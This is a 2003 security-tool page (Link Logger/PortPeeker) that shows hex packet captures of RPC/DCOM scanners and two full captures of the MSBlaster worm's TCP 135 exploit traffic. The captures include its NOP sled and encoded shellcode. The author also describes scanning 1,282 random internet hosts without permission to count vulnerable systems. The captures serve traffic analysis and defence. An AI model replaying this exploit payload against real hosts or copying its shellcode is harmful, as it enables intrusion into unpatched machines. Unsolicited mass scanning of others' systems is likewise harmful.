Link Logger Home ZyXel Banner Binary Visions
Netgear
LinkSYS
Router

SQLSlammer
Link Logger for Windows
Home Home Product Info Product Info Download Download/Purchase Support Support  
Link Logger for Windows

NewsLatest News

Screen ShotsScreenshots

Customer CommentsFeedback

Common ScansScans

Additional ResourcesResources

PortPeekerPortPeeker

PortPeeker Captures of various RPC/DCOM scanning tools

RPC/DCOM description at Cert.org

TCP Port 135

** Note this is the metasploit/xfocus signature **

24.26.153.56 : 2715 TCP Data In
--- 7/31/03 15:16:53.200
0000 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 ........H......
0010 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
0020 A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
0030 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
0040 2B 10 48 60 02 00 00 00                         +.H`....


** Note this is the eEye signature **

68.144.192.227 : 13222 TCP Data In
--- 7/31/03 17:21:20.710
0000 05 00 0B 03 10 00 00 00 48 00 00 00 09 00 00 00 ........H.......
0010 D0 16 D0 16 00 00 00 00 01 00 00 00 02 00 01 00 ................
0020 B8 4A 9F 4D 1C 7D CF 11 86 1E 00 20 AF 6E 7C 57 .J.M.}..... .n|W
0030 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
0040 2B 10 48 60 02 00 00 00                         +.H`....



** Note this is the Internet Security System Scanms signature **

68.144.192.227 : 13755 TCP Data In
--- 7/31/03 19:28:00.310
0000 05 00 0B 03 10 00 00 00 CC 00 00 00 84 67 BE 18 .............g..
0010 31 14 5C 16 00 00 00 00 04 00 00 00 01 00 01 00 1.\.............
0020 B8 4A 9F 4D 1C 7D CF 11 86 1E 00 20 AF 6E 7C 57 .J.M.}..... .n|W
0030 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
0040 2B 10 48 60 02 00 00 00 02 00 01 00 A0 01 00 00 +.H`............
0050 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 00 00 ...........F....
0060 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 .]..........+.H`
0070 02 00 00 00 03 00 01 00 0A 42 24 0A 00 17 21 41 .........B$...!A
0080 2E 48 01 1D 13 0B 04 4D 00 00 00 00 04 5D 88 8A .H.....M.....]..
0090 EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 ........+.H`....
00A0 04 00 01 00 B0 01 52 97 CA 59 CF 11 A8 D5 00 A0 ......R..Y......
00B0 C9 0D 80 51 00 00 00 00 04 5D 88 8A EB 1C C9 11 ...Q.....]......
00C0 9F E8 08 00 2B 10 48 60 02 00 00 00             ....+.H`....


** First Capture of MSBlaster worm scan August 10th and posted on DSLReports **

TCP Connection Request
--- 8/10/03 18:38:27.580

65.33.159.235 : 1040 TCP Connected ID = 6
--- 8/10/03 18:38:27.690
Status Code: 0 OK

65.33.159.235 : 1040 TCP Data In
--- 8/10/03 18:38:29.390
0000 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 ........H......
0010 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
0020 A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
0030 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
0040 2B 10 48 60 02 00 00 00                         +.H`....

65.33.159.235 : 1040 TCP Data In
--- 8/10/03 18:38:29.720
0000 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
0010 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
0020 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
0030 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
0040 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
0050 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j. 
0060 AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
0070 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
0080 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
0090 A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
00A0 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
00B0 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
00C0 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
00D0 E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
00E0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00F0 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
0100 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
0110 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0120 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0130 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0140 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0150 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0160 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
0180 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
0190 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
01A0 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01F0 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
0200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
0210 C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
0220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
0230 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
0240 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
0250 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
0280 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
0290 C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
02A0 C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
02B0 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
02C0 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
02D0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
02E0 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
02F0 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
0300 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
0310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
0320 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0340 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
0350 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
0360 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
0370 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
0380 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
0390 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
03A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0440 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
0450 FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
0460 EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
0470 BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
0480 F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
0490 B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
04A0 EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
04B0 BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
04C0 BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
04D0 BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
04E0 BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
04F0 BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
0500 BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
0510 BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
0520 BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
0530 BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
0540 A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
0550 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
0560 D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
0570 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
0580 AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
0590 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
05A0 C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
05B0 77 65 6B D6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 wek......d.!.2..
05C0 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 :...4r....9..:.
05D0 34 72 A0 0B 17 8A 94 80 BF B9 51 DE E2 F0 90 80 4r........Q.....
05E0 EC 67 C2 D7 34 5E B0 98 34 77 A8 0B EB 37 EC 83 .g..4^..4w...7..
05F0 6A B9 DE 98 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 j...4h..b...4...
0600 4A 01 6B 7C 8C F2 38 BA 7B 46 93 41 70 3F 97 78 J.k|..8.{F.Ap?.x
0610 54 C0 AF FC 9B 26 E1 61 34 68 B0 83 62 54 1F 8C T....&.a4h..bT..
0620 F4 B9 CE 9C BC EF 1F 84 34 31 51 6B BD 01 54 0B ........41Qk..T.
0630 6A 6D CA DD E4 F0 90 80 2F A2 04 00 5C 00 43 00 jm....../...\.C.
0640 24 00 5C 00 31 00 32 00 33 00 34 00 35 00 36 00 $.\.1.2.3.4.5.6.
0650 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
0660 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2E 00 1.1.1.1.1.1.1...
0670 64 00 6F 00 63 00 00 00 01 10 08 00 CC CC CC CC d.o.c...........
0680 20 00 00 00 30 00 2D 00 00 00 00 00 88 2A 0C 00 ...0.-......*..
0690 02 00 00 00 01 00 00 00 28 8C 0C 00 01 00 00 00 ........(.......
06A0 07 00 00 00 00 00 00 00                         ........

65.33.159.235 : 1040 TCP Disconnected ID = 6
--- 8/10/03 18:38:33.400
Status Code: 0 OK 

 

** Single packet capture of the MSBlaster worm scan **

TCP Connection Request
--- 8/11/03 15:21:58.920

68.144.8.39 : 4194 TCP Connected ID = 10
--- 8/11/03 15:21:59.300
Status Code: 0 OK

68.144.8.39 : 4194 TCP Data In
--- 8/11/03 15:21:59.850
0000 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 ........H......
0010 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
0020 A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
0030 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
0040 2B 10 48 60 02 00 00 00 05 00 00 03 10 00 00 00 +.H`............
0050 A8 06 00 00 E5 00 00 00 90 06 00 00 01 00 04 00 ................
0060 05 00 06 00 01 00 00 00 00 00 00 00 32 24 58 FD ............2$X.
0070 CC 45 64 49 B0 70 DD AE 74 2C 96 D2 60 5E 0D 00 .EdI.p..t,..`^..
0080 01 00 00 00 00 00 00 00 70 5E 0D 00 02 00 00 00 ........p^......
0090 7C 5E 0D 00 00 00 00 00 10 00 00 00 80 96 F1 F1 |^..............
00A0 2A 4D CE 11 A6 6A 00 20 AF 6E 72 F4 0C 00 00 00 *M...j. .nr.....
00B0 4D 41 52 42 01 00 00 00 00 00 00 00 0D F0 AD BA MARB............
00C0 00 00 00 00 A8 F4 0B 00 20 06 00 00 20 06 00 00 ........ ... ...
00D0 4D 45 4F 57 04 00 00 00 A2 01 00 00 00 00 00 00 MEOW............
00E0 C0 00 00 00 00 00 00 46 38 03 00 00 00 00 00 00 .......F8.......
00F0 C0 00 00 00 00 00 00 46 00 00 00 00 F0 05 00 00 .......F........
0100 E8 05 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
0110 C8 00 00 00 4D 45 4F 57 E8 05 00 00 D8 00 00 00 ....MEOW........
0120 00 00 00 00 02 00 00 00 07 00 00 00 00 00 00 00 ................
0130 00 00 00 00 00 00 00 00 00 00 00 00 C4 28 CD 00 .............(..
0140 64 29 CD 00 00 00 00 00 07 00 00 00 B9 01 00 00 d)..............
0150 00 00 00 00 C0 00 00 00 00 00 00 46 AB 01 00 00 ...........F....
0160 00 00 00 00 C0 00 00 00 00 00 00 46 A5 01 00 00 ...........F....
0170 00 00 00 00 C0 00 00 00 00 00 00 46 A6 01 00 00 ...........F....
0180 00 00 00 00 C0 00 00 00 00 00 00 46 A4 01 00 00 ...........F....
0190 00 00 00 00 C0 00 00 00 00 00 00 46 AD 01 00 00 ...........F....
01A0 00 00 00 00 C0 00 00 00 00 00 00 46 AA 01 00 00 ...........F....
01B0 00 00 00 00 C0 00 00 00 00 00 00 46 07 00 00 00 ...........F....
01C0 60 00 00 00 58 00 00 00 90 00 00 00 40 00 00 00 `...X.......@...
01D0 20 00 00 00 38 03 00 00 30 00 00 00 01 00 00 00 ...8...0.......
01E0 01 10 08 00 CC CC CC CC 50 00 00 00 4F B6 88 20 ........P...O.. 
01F0 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................
0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0240 01 10 08 00 CC CC CC CC 48 00 00 00 07 00 66 00 ........H.....f.
0250 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
0260 10 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
0270 00 00 00 00 78 19 0C 00 58 00 00 00 05 00 06 00 ....x...X.......
0280 01 00 00 00 70 D8 98 93 98 4F D2 11 A9 3D BE 57 ....p....O...=.W
0290 B2 00 00 00 32 00 31 00 01 10 08 00 CC CC CC CC ....2.1.........
02A0 80 00 00 00 0D F0 AD BA 00 00 00 00 00 00 00 00 ................
02B0 00 00 00 00 00 00 00 00 18 43 14 00 00 00 00 00 .........C......
02C0 60 00 00 00 60 00 00 00 4D 45 4F 57 04 00 00 00 `...`...MEOW....
02D0 C0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
02E0 3B 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ;..............F
02F0 00 00 00 00 30 00 00 00 01 00 01 00 81 C5 17 03 ....0...........
0300 80 0E E9 4A 99 99 F1 8A 50 6F 7A 85 02 00 00 00 ...J....Poz.....
0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0320 00 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC ................
0330 30 00 00 00 78 00 6E 00 00 00 00 00 D8 DA 0D 00 0...x.n.........
0340 00 00 00 00 00 00 00 00 20 2F 0C 00 00 00 00 00 ........ /......
0350 00 00 00 00 03 00 00 00 00 00 00 00 03 00 00 00 ................
0360 46 00 58 00 00 00 00 00 01 10 08 00 CC CC CC CC F.X.............
0370 10 00 00 00 30 00 2E 00 00 00 00 00 00 00 00 00 ....0...........
0380 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
0390 68 00 00 00 0E 00 FF FF 68 8B 0B 00 02 00 00 00 h.......h.......
03A0 00 00 00 00 00 00 00 00 86 01 00 00 00 00 00 00 ................
03B0 86 01 00 00 5C 00 5C 00 46 00 58 00 4E 00 42 00 ....\.\.F.X.N.B.
03C0 46 00 58 00 46 00 58 00 4E 00 42 00 46 00 58 00 F.X.F.X.N.B.F.X.
03D0 46 00 58 00 46 00 58 00 46 00 58 00 9F 75 18 00 F.X.F.X.F.X..u..
03E0 CC E0 FD 7F CC E0 FD 7F 90 90 90 90 90 90 90 90 ..............
03F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0450 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0460 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0470 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0480 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB ................
0490 19 5E 31 C9 81 E9 89 FF FF FF 81 36 80 BF 32 94 .^1........6..2.
04A0 81 EE FC FF FF FF E2 F2 EB 05 E8 E2 FF FF FF 03 ................
04B0 53 06 1F 74 57 75 95 80 BF BB 92 7F 89 5A 1A CE S..tWu......Z..
04C0 B1 DE 7C E1 BE 32 94 09 F9 3A 6B B6 D7 9F 4D 85 ..|..2...:k...M.
04D0 71 DA C6 81 BF 32 1D C6 B3 5A F8 EC BF 32 FC B3 q....2...Z...2..
04E0 8D 1C F0 E8 C8 41 A6 DF EB CD C2 88 36 74 90 7F .....A......6t.
04F0 89 5A E6 7E 0C 24 7C AD BE 32 94 09 F9 22 6B B6 .Z.~.$|..2..."k.
0500 D7 4C 4C 62 CC DA 8A 81 BF 32 1D C6 AB CD E2 84 .LLb.....2......
0510 D7 F9 79 7C 84 DA 9A 81 BF 32 1D C6 A7 CD E2 84 ..y|.....2......
0520 D7 EB 9D 75 12 DA 6A 80 BF 32 1D C6 A3 CD E2 84 ...u..j..2......
0530 D7 96 8E F0 78 DA 7A 80 BF 32 1D C6 9F CD E2 84 ....x.z..2......
0540 D7 96 39 AE 56 DA 4A 80 BF 32 1D C6 9B CD E2 84 ..9.V.J..2......
0550 D7 D7 DD 06 F6 DA 5A 80 BF 32 1D C6 97 CD E2 84 ......Z..2......
0560 D7 D5 ED 46 C6 DA 2A 80 BF 32 1D C6 93 01 6B 01 ...F..*..2....k.
0570 53 A2 95 80 BF 66 FC 81 BE 32 94 7F E9 2A C4 D0 S....f...2..*..
0580 EF 62 D4 D0 FF 62 6B D6 A3 B9 4C D7 E8 5A 96 80 .b...bk...L..Z..
0590 AE 6E 1F 4C D5 24 C5 D3 40 64 B4 D7 EC CD C2 A4 .n.L.$..@d......
05A0 E8 63 C7 7F E9 1A 1F 50 D7 57 EC E5 BF 5A F7 ED .c....P.W...Z..
05B0 DB 1C 1D E6 8F B1 78 D4 32 0E B0 B3 7F 01 5D 03 ......x.2....].
05C0 7E 27 3F 62 42 F4 D0 A4 AF 76 6A C4 9B 0F 1D D4 ~'?bB....vj.....
05D0 9B 7A 1D D4 9B 7E 1D D4 9B 62 19 C4 9B 22 C0 D0 .z...~...b..."..
05E0 EE 63 C5 EA BE 63 C5 7F C9 02 C5 7F E9 22 1F 4C .c...c.....".L
05F0 D5 CD 6B B1 40 64 98 0B 77 65 6B D6 93 CD C2 94 ..k.@d..wek.....
0600 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B .d.!.2..:...4r..
0610 CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 17 8A 94 80 ..9..:.4r......
0620 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 34 5E B0 98 ..Q......g..4^..
0630 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 34 68 B4 83 4w...7..j...4h..
0640 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 8C F2 38 BA b...4...J.k|..8.
0650 7B 46 93 41 70 3F 97 78 54 C0 AF FC 9B 26 E1 61 {F.Ap?.xT....&.a
0660 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C BC EF 1F 84 4h..bT..........
0670 34 31 51 6B BD 01 54 0B 6A 6D CA DD E4 F0 90 80 41Qk..T.jm......
0680 2F A2 04 00 5C 00 43 00 24 00 5C 00 31 00 32 00 /...\.C.$.\.1.2.
0690 33 00 34 00 35 00 36 00 31 00 31 00 31 00 31 00 3.4.5.6.1.1.1.1.
06A0 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
06B0 31 00 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 1.1.1...d.o.c...
06C0 01 10 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 ........ ...0.-.
06D0 00 00 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 .....*..........
06E0 28 8C 0C 00 01 00 00 00 07 00 00 00 00 00 00 00 (...............

68.144.8.39 : 4194 TCP Disconnected ID = 10
--- 8/11/03 15:22:14.570
Status Code: 0 OK

 

 

I love numbers as they can tell a pretty good story about what is going to happen, so when I see someone say 20 - 40% of systems are vulnerable I have to check for myself so I scanned a number of systems at random from around the world August 11 at about 1 AM local time to find out for myself about what percentage of systems are vulnerable using a simple eEye type scan.

Total Systems scanned (don't be surprised if my IP address shows up in myNetWatchman or DShield)
1282

Total Patched
346 - 26.99%

Total Vulnerable
738 - 57.57%

Total Not Vulnerable for other reasons (Windows 9x/ME, DCOM disabled, etc)
198 - 15.44%

It would appear that the far east is going to get whacked again as they tend to have the higher percentages of vulnerable systems (if your outsourcing anything in India might I suggest placing a call to them to see if they have patched against this impending attack as I would have my doubts).

 

While PortPeeker is not an officially supported product if you have any suggestions or find any bugs please send them to PortPeeker@LinkLogger.com